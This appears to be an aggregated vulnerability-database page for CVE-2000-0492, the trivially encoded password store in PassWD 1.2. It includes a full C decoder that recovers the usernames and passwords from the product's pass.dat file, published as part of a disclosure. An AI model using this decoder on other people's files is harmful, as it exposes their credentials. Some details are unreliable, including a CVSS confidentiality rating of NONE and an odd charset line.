CVE-2000-0492
CVSS 5.0
Published: 2000-06-04 00:00:00
Last revised: 2008-09-10 15:04:48

[Original] PassWD 1.2 uses weak encryption (trivial encoding) to store passwords, which allows an attacker who can read the password file to easily decrypt the passwords.


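[CNNVD] PassWD 1.2 weak encryption vulnerability (CNNVD-200006-012)

        PassWD 1.2 uses weak encryption (trivial encoding) to store passwords. An attacker who can read the password file can exploit this vulnerability to easily recover the passwords.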

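- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on the availability of the system]
Access complexity: LOW [exploitation has no access restrictions]
Access vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found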

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0492
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0492
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200006-012
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2000-05/0450.html
(VENDOR_ADVISORY)  BUGTRAQ  20000609 Insecure encryption in PassWD v1.2
http://www.securityfocus.com/bid/1300
(UNKNOWN)  BID  1300

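- Vulnerability information

PassWD 1.2 weak encryption vulnerability
Medium severity  Design error
2000-06-04 00:00:00 2005-10-20 00:00:00
Remote / Local
        PassWD 1.2 uses weak encryption (trivial encoding) to store passwords. An attacker who can read the password file can exploit this vulnerability to easily recover the passwords.

- Advisories and patches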

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (19989)

PassWD 1.2 Weak Encryption Vulnerability (EDBID:19989)
windows local
2000-06-04 Verified
0 Daniel Roethlisberger
N/A
source: http://www.securityfocus.com/bid/1300/info

PassWd 1.2 is a password management utility designed to store user login information to various URLs. The login information, which includes username, password and link location is stored in the pass.dat file which resides in the PassWD directory. The information is encrypted with a weak encoding algorithm and includes the key which can be used to decode any stored password. 

/*
 *  Decoder for PassWD v1.2 `pass.dat' password files
 *
 *  Written 2000 by Daniel Roethlisberger <admin@roe.ch>
 *
 *  This code is hereby placed in the public domain.
 *  Use this code at your own risk for whatever you want.
 *
 *  The decoded data is not parsed in any way - it should
 *  be very easy to moderately experienced programmers
 *  to add that themselves.
 *
 */

#include <stdio.h>

int main(int argc, char *argv[])
{
   unsigned char charpos;
   FILE* outfile;
   FILE* infile;
   int a;              /* int rather than unsigned char, so EOF is detectable */
   int b;
   unsigned char key;
   int x;

   /* the 99-character alphabet, written twice so that the index
      charpos + 99 - key never needs an explicit modulo */
   unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

   printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
   printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");

   if((argc > 3) || (argc < 2))
   {
      printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
      printf("If <outfile> is omitted, the output is dumped to stdout.\n");
      return 1;
   }

   infile = fopen(argv[1], "r");
   if(infile == NULL)
   {
      printf("Could not open file %s\n", argv[1]);
      return 1;
   }

   if(argc == 2)
      outfile = stdout;
   else
   {
      outfile = fopen(argv[2], "w");
      if(outfile == NULL)
      {
         printf("Could not write to file %s\n", argv[2]);
         fclose(infile);
         return 1;
      }
   }

   getc(infile);       /* jump over decoy byte    */
   a = getc(infile);   /* read encoded key byte 1 */
   b = getc(infile);   /* read encoded key byte 2 */

   if(b == EOF)
   {
      printf("ERROR - encountered EOF within header\n");
      fclose(infile);
      if(outfile != stdout)
         fclose(outfile);
      return 1;
   }

   /* this line `decodes' the key */
   key = (unsigned char)((a - 'b') * 10 + (b - 'b'));

   /* read through infile and dump decoded output to outfile: */
   x = getc(infile);
   while(x != EOF)
   {
      for(charpos = 0; x != charset[charpos]; charpos++)
      {
         if(charpos > 99)
         {
            printf("\nERROR - encountered illegal character in source file\n");
            fclose(infile);
            if(outfile != stdout)
               fclose(outfile);
            return 1;
         }
      }
      /* a key this large would index before the start of charset */
      if(key > charpos + 99)
      {
         printf("\nERROR - encountered illegal key in source file\n");
         fclose(infile);
         if(outfile != stdout)
            fclose(outfile);
         return 1;
      }
      /* plain = cypher - key */
      putc(charset[charpos + 99 - key], outfile);
      x = getc(infile);
   }

   if(argc == 2)
      printf("\n\n");
   printf("Done.\n");

   fclose(infile);
   if(outfile != stdout)
      fclose(outfile);
   return 0;
}




		

- Vulnerability information

6493
PassWD Weogj System Passwords Storage Encryption Weakness
Local Access Required Cryptographic
Loss of Confidentiality Discontinued Product
Exploit Public Vendor Verified, Third-party Verified

- Vulnerability description

- Timeline

2000-06-03 Unknown
2000-06-03 Unknown

- Solution

The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

PassWD 1.2 Weak Encryption Vulnerability
Design Error 1300
Yes Yes
2000-06-04 12:00:00 2009-07-11 02:56:00
Discovered by and posted to Bugtraq on June 4, 2000 by Daniel Roethlisberger <admin@roe.ch>

- Affected program versions

PassWD PassWD 1.2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- Vulnerability discussion

PassWd 1.2 is a password management utility designed to store user login information to various URLs. The login information, which includes username, password and link location is stored in the pass.dat file which resides in the PassWD directory. The information is encrypted with a weak encoding algorithm and includes the key which can be used to decode any stored password.

- Exploit

The following exploit has been provided by Daniel Roethlisberger <admin@roe.ch>:

- Solution

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
